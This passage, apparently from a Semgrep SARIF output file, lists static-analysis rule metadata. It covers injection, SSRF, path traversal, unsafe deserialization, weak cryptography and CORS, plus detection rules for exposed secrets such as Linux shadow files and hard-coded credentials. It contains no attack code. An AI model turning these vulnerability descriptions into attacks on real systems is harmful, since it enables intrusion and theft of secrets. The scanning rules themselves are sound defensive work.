class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","id":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","name":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection","id":"javascript.phantom.security.audit.phantom-injection.phantom-injection","name":"javascript.phantom.security.audit.phantom-injection.phantom-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.phantom.security.audit.phantom-injection.phantom-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","id":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","name":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","id":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","name":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"help":{"markdown":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","id":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","name":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","properties":{"precision":"very-high","tags":["CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal)\n - [https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values](https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"helpUri":"https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","id":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","name":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","id":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","name":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"linux shadow file detected"},"help":{"markdown":"linux shadow file detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"linux shadow file detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow","id":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","name":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-etc-shadow.detected-etc-shadow"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","id":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","name":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"help":{"markdown":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"Use of RSA-$BITS, which is considered weak. Based on NIST standards, RSA keys should be at least 2048 bits."},"helpUri":"https://semgrep.dev/r/typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","id":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","name":"typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.typescript.node.security.node-rsa-weak-key.node-rsa-weak-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of Blowfish was detected. Blowfish uses a 64-bit block size that makes it vulnerable to birthday attacks, and is therefore considered non-compliant. Instead, use a strong, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","id":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","name":"java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-blowfish.use-of-blowfish"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"help":{"markdown":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context)\n - [https://tools.ietf.org/html/rfc7568](https://tools.ietf.org/html/rfc7568)\n - [https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html](https://tools.ietf.org/id/draft-ietf-tls-oldversions-deprecate-02.html)\n","text":"An insecure SSL context was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use SSLContext.getInstance(\"TLSv1.2\") for the best security."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.weak-ssl-context.weak-ssl-context","id":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","name":"java.lang.security.audit.weak-ssl-context.weak-ssl-context","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.weak-ssl-context.weak-ssl-context"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"CodeClimate detected"},"help":{"markdown":"CodeClimate detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"CodeClimate detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-codeclimate.detected-codeclimate","id":"generic.secrets.security.detected-codeclimate.detected-codeclimate","name":"generic.secrets.security.detected-codeclimate.detected-codeclimate","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-codeclimate.detected-codeclimate"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://yaml.readthedocs.io/en/latest/api/](https://yaml.readthedocs.io/en/latest/api/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. Starting from `ruamel.yaml` version 0.15.0 the default loader (`typ='rt'`) is a direct derivative of the safe loader. Before this version, use the optional argument `Loader` with value `SafeLoader` or `CSafeLoader`, or use the `safe_load` function."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","id":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","name":"python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-ruamel-aws-lambda.tainted-ruamel-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"help":{"markdown":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command)\n - [https://www.stackhawk.com/blog/command-injection-java/](https://www.stackhawk.com/blog/command-injection-java/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - [https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java](https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-078/ExecUnescaped.java)\n","text":"Detected user input entering a method which executes a system command. This could result in a command injection vulnerability, which allows an attacker to inject an arbitrary system command onto the server. The attacker could download malware onto or steal data from the server. Instead, use ProcessBuilder, separating the command into individual arguments, like this: `new ProcessBuilder(\"ls\", \"-al\", targetDirectory)`. Further, make sure you hardcode or allowlist the actual command so that attackers can't run arbitrary commands."},"helpUri":"https://semgrep.dev/r/java.spring.security.injection.tainted-system-command.tainted-system-command","id":"java.spring.security.injection.tainted-system-command.tainted-system-command","name":"java.spring.security.injection.tainted-system-command.tainted-system-command","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.injection.tainted-system-command.tainted-system-command"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","id":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","name":"typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any","properties":{"precision":"very-high","tags":["CWE-183: Permissive List of Allowed Inputs","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-cors-any.nestjs-header-cors-any"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","id":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","name":"swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.rabbit-hardcoded-secret.rabbit-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"File name based on user input risks server-side request forgery."},"help":{"markdown":"File name based on user input risks server-side request forgery.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"File name based on user input risks server-side request forgery."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-filename.tainted-filename","id":"php.lang.security.injection.tainted-filename.tainted-filename","name":"php.lang.security.injection.tainted-filename.tainted-filename","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-filename.tainted-filename"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with 